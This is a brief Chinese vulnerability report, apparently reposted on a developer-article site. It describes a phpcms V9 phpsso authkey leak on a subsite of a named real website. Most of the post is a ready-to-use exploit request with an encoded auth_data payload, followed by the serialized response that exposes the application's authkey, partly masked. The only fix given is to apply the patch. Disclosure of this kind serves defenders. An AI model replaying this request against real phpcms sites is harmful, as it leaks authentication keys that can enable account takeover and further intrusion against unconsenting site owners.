爱丽网某分站phpcmsV9 authkey泄露漏洞
程序员文章站
2022-06-19 12:34:01
爱丽网某分站phpcmsV9 authkey泄露漏洞
https://product.aili.com//phpsso_server/index.php?m=...
爱丽网某分站phpcmsV9 authkey泄露漏洞
https://product.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ
a:1:{i:2;a:9:{s:5:"appid";s:1:"2";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:7:"product";s:3:"url";s:24:"https://product.cvc8.com/";s:7:"authkey";s:32:"7onsikbx7dwg1u42*******x07niziqox";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:5:"utf-8";s:8:"synlogin";s:1:"1";}}
解决方案:
更新补丁
上一篇: 命令行下一种新的加帐号的方法
下一篇: Z-blog跨站脚本攻击漏洞